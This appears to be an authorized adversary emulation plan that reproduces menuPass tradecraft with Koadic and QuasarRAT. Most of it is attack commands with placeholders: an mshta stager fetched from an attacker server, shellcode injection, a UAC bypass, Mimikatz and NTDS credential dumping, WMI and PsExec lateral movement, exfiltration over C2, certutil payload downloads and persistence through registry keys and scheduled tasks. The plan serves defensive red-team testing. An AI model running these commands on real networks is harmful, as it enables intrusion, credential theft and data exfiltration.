Scenario 2 is designed to emulate activity attributed to menuPass that entails the pursuit of tactical objectives using a command-and-control framework with the operational intent of data exfiltration. Initial access could be achieved with either spearphishing or an assumed breach in which the emulation team is granted access to a host. The scenario will begin when execution is achieved, and command and control is established. This scenario differs from Scenario 1 in that instead of uploading an operational toolkit to the victim environment, it employs tactical and sustained malware to execute the subsequent procedures. In emulating this scenario, you will be assessing your organization's ability to protect, detect, and defend execution, command and control, lateral movement, persistence, and exfiltration.
- Emulating menuPass using tools like Koadic C3 and QuasarRat.
- Scenario 2 begins after a host is compromised, tactical malware has been deployed, and C2 is established.
- Your objectives in Phase 2 are to conduct discovery, escalate privileges, harvest credentials, move laterally, choose specific systems to persist sustained malware (optional), collect, stage, and exfiltrate real or simulated data.
There are many alternatives to the procedures detailed in this scenario. What is most important is that these procedures have been accomplished, not necessarily how they have been accomplished. If you lack the resources to complete this scenario procedure-by-procedure, feel free to "white card" or simulate where necessary.
- You have either ownership of, or explicit authority and/or authorization to operate against the target network.
- You have established your operational infrastructure.
- You have selected and installed your tactical implant/command-and-control framework.
- If you intend to deploy and persist sustained malware, you have identified and compiled your implant.
- Step 1 - Initial Access
- Step 2 - Execution
- Step 3 - Discovery
- Step 4 - Privilege Escalation
- Step 5 - Credential Access
- Step 6 - Lateral Movement
- Step 7 - Exfiltration
- Step 8 - Command and Control
- Step 9 - Persistence
Aside from trusted relationship abuse, menuPass is perhaps best known for efforts to achieve initial access to target networks by deploying phishing emails. These phishing emails deployed tactical malware by one of the four previously discussed methods (macro, .lnk, exploit, masquerading). menuPass has leveraged this initial access to conduct discovery, pursue credential access, and identify systems of interest on which to deploy and persist sustained malware.
2.A - User Execution: Malicious File (T1204.002)
menuPass is reported to have employed LNK files to achieve user execution. These LNK files utilized scripting languages to invoke the Windows command line, download and execute tactical implants.16
MSHTA was used to accomplish execution and situate the tactical implant, Koadic, in memory. This tactical implant was used to conduct discovery, credential access, lateral movement.
Attacker
./koadic
koadic: use stager/js/mshta
(koadic: sta/js/mshta)# set SRVHOST #{ip_address}
(koadic: sta/js/mshta)# set SRVPORT #{listening_port}
(koadic: sta/js/mshta)# run
[>] mshta http://#{ip_address/#{file_name}Target
C:\Users\Victim> mshta http://{#ip_address}/#{file_name}In some instances, soon after establishing C2, menuPass is reported to have introduced an additional implant to enhance operational capabilities.15 16 They did so by using Koadic to inject arbitrary shellcode into a process. Excel must be present on the host to use this procedure.
(koadic: sta/js/mshta)# use implant/inject/shellcode_excel
(koadic: implant/inj/shellcode_excel)# set shellcode #{ASCIIhex_shellcode}
(koadic: implant/inj/shellcode_excel)# set zombie #{zombie_id}
(koadic: implant/inj/shellcode_excel)# runAfter achieving initial execution, menuPass actors are reported to have performed cursory situational awareness checks. These checks are intended to determine suitability for implantation with a sustained implant.16
3.A - System Network Configuration Discovery (T1016), System Network Connections Discovery (T1049) 16
Attacker
(koadic: sta/js/mshta)# zombies
(koadic: sta/js/mshta)# cmdshell #{zombie_id}
C:\Users\Victim> ipconfig /all
C:\Users\Victim> tasklist /v
C:\Users\Victim> net view
C:\Users\Victim> netstat -ano(koadic: sta/js/mshta)# use implant/scan/tcp
(koadic: imp/sca/tcp)# set rhosts #{remote_hosts}
(koadic: imp/sca/tcp)# set rports #{ports_to_scan}
(koadic: imp/sca/tcp)# set zombies #{zombie_id}
(koadic: imp/sca/tcp)# runIn Scenario 1, menuPass is presumed to have initially accessed the target environment using compromised credentials that granted elevated privileges. As such, privilege escalation was not necessary. menuPass is reported to have sought access to additional credentials to ensure freedom of movement throughout the domain. This elevated access was a result of the method of initial access.
Scenario 2 differs in this regard as the initial method of access is presumed to be phishing. Phishing does not always result in elevated access. As such, elevation to increase process integrity is required to use the tools that grant additional credential access. As such, we suggest either "white carding" Administrative access or leveraging Koadic's "elevate" modules to attempt escalation.
(koadic: sta/js/mshta)# use implant/elevate/bypassuac_eventvwr
(koadic: implant/ele/bypassuac_eventvwr)# set payload #{payload_id}
(koadic: implant/ele/bypassuac_eventvwr)# set zombie #{zombie_id}
(koadic: implant/ele/bypassuac_eventvwr)# runCheck Privileges
(koadic: implant/ele/bypassuac_eventvwr)# zombies #{zombie_id}(koadic: sta/js/mshta)# use implant/inject/mimikatz_dotnet2js
(koadic: imp/inj/mimikatz_dotnet2js)# set mimicmd #{mimikatz_command}
(koadic: imp/inj/mimikatz_dotnet2js)# set zombie #{zombie_id}5.B - OS Credential Dumping: NTDS (T1003.003)
menuPass is reported to have sought access to additional credentials to ensure freedom of movement throughout the domain.
(koadic: sta/js/mshta)# use implant/gather/hashdump_dc
(koadic: imp/gat/hashdump_dc)# set lpath #{local_file_path}
(koadic: imp/gat/hashdump_dc)# set drive #{drive_to_shadow_copy}
(koadic: imp/gat/hashdump_dc)# set rpath #{remote_file_save_path}
(koadic: imp/gat/hashdump_dc)# set certutil true
(koadic: imp/gat/hashdump_dc)# set zombie #{zombie_id}
(koadic: imp/gat/hashdump_dc)# runNtdsutil32
This procedure leverages a tool commonly featured on Windows Server, ntdsutil.exe, to dump the SYSTEM AND SECURITY registry hives from the domain controller. These files will be copied to a specified directory and must be egressed from the network in order to dump credentials locally. This procedure requires Administrative privileges and access to the domain controller but does not require credentials.
Ntdsutil.exe must be present on the host.
(koadic: sta/js/mshta)# cmdshell #{zombie_id}
C:\Users\Victim> powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\ProgramData\Temp' q q"Download the file
(koadic: sta/js/mshta)# use implant/utils/download_file
(koadic: imp/uti/download_file)# set lpath #{local_file_save_path}
(koadic: imp/uti/download_file)# set rfile #{file_to_download}
(koadic: imp/uti/download_file)# set certutil true
(koadic: imp/uti/download_file)# set zombie #{zombie_id}
(koadic: imp/uti/download_file)# runAfter copying and exfiltrating the NTDS.dit file, you will use Impacket's secretsdump to dump credentials locally.
secretsdump.exe -system #{system_hive_local_path\SYSTEM} -security #{security_hive_local_path\SECURITY} -ntds #{ntds_local_path\ntds.dit} local6.A - Windows Management Instrumentation (T1047)
(koadic: sta/js/mshta)# use implant/pivot/stage_wmi
(koadic: implant/piv/stage_wmi)# set rhost #{remote_host}
(koadic: implant/piv/stage_wmi)# set smbuser #{user_name}
(koadic: implant/piv/stage_wmi)# set smbpass #{password}
(koadic: implant/piv/stage_wmi)# set smbdomain #{domain}
(koadic: implant/piv/stage_wmi)# set payload #{payload_id}
(koadic: implant/piv/stage_wmi)# set zombie #{zombie_id}
(koadic: implant/piv/stage_wmi)# run
System Services: Service Execution (T1569.002)
Upload PsExec to the host
(koadic: sta/js/mshta)# use implant/utils/upload_file
(koadic: imp/uti/upload_file)# set lfile #{local_file_to_upload}
(koadic: imp/uti/upload_file)# set zombie #{zombie_id}
(koadic: imp/uti/upload_file)# runPsExec to remote host
(koadic: sta/js/mshta)# use implant/pivot/exec_psexec
(koadic: implant/piv/exec-psexec)# set cmd #{command_to_run}
(koadic: implant/piv/exec-psexec)# set rhost #{remote_host}
(koadic: implant/piv/exec-psexec)# set smbuser #{user_name}
(koadic: implant/piv/exec-psexec)# set smbpass #{password}
(koadic: implant/piv/exec-psexec)# set credid #{credential_ip}
(koadic: implant/piv/exec-psexec)# set rpath #{remote_path_to_psexec}
(koadic: implant/piv/exec-psexec)# set zombie #{zombie_id}
(koadic: implant/piv/exec-psexec)# run7.A - Exfiltration Over C2 Channel (T1041)
(koadic: sta/js/mshta)# use implant/utils/download_file
(koadic: imp/uti/download_file)# set lpath #{local_file_save_path}
(koadic: imp/uti/download_file)# set rfile #{file_to_download}
(koadic: imp/uti/download_file)# set certutil true
(koadic: imp/uti/download_file)# set zombie #{zombie_id}
(koadic: imp/uti/download_file)# runmenuPass actors are reported to have introduced sustained malware to target networks. Poison Ivy, PlugX, and more recently, the publicly available QuasarRat are reported to have been used by menuPass actors.4 11 13 25 These implants provide the attacker with additional capabilities. More importantly, these implants are used to ensure persistent access to the target network.
menuPass actors are reported to have conducted ingress tool transfer using several different techniques. You may choose to use Koadic's built-in functionality or leverage tools native to the Windows environment. menuPass actors are reported to have done both.15 16
8.A - Ingress Tool Transfer (T1105)
menuPass may have accessed the command-line to use a tool native to the Windows environment (certutil) to download and decode additional capabilities.16
(koadic: sta/js/mshta)# cmdshell #{zombie_id}
C:\Users\Victim> certutil.exe -urlcache -split -f https://www.#{payload_server.com}/#{file}(koadic: sta/js/mshta)# use implant/utils/upload_file
(koadic: imp/uti/upload_file)# set lfile #{local_file_to_upload}
(koadic: imp/uti/upload_file)# set zombie #{zombie_id}
(koadic: imp/uti/upload_file)# runmenuPass actors are reported to have persisted both tactical and sustained malware.4 5 11 25 Tactical malware should be thought of as the "work horse." It is the tool used to accomplish tactical objectives and is therefore, more likely to be detected. menuPass is reported to have been deliberate in the deployment and persistence of sustained malware. These implants were employed to facilitate long-term access to target environments.11 Sustained malware was deployed to systems that afforded the ability to blend in, remain undetected, or facilitate access to a resource deemed essential. Select your host for persistence carefully, and do not persist tactical and sustained implants on the same host.
9.A - Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder (T1547.001)
Tactical Malware
(koadic: sta/js/mshta)# use implant/persist/registry
(koadic: imp/per/registry)# set payload #{payload_id}
(koadic: imp/per/registry)# set zombie #{zombie_id}
(koadic: imp/per/registry)# runAlternative Procedure: Scheduled Task/Job: Scheduled Task (T1053.005)
Tactical Malware
(koadic: sta/js/mshta)# use implant/persist/schtasks
(koadic: imp/per/schtasks)# set payload #{payload_id}
(koadic: imp/per/schtasks)# set zombie #{zombie_id}
(koadic: imp/per/schtasks)# runSustained Malware
menuPass actors are reported to have persisted implants using several different procedures to include, creating scheduled tasks, registry keys, Windows services, and dropping LNK files in the Startup folder.4 5 11 25 If you choose to use QuasarRAT as your sustained implant, may either select "Run Client when the computer starts" from the Client Builder menu when generating your implant or do so using the Windows command line. QuasarRAT creates a registry run key and schedules a task in order to establish persistence.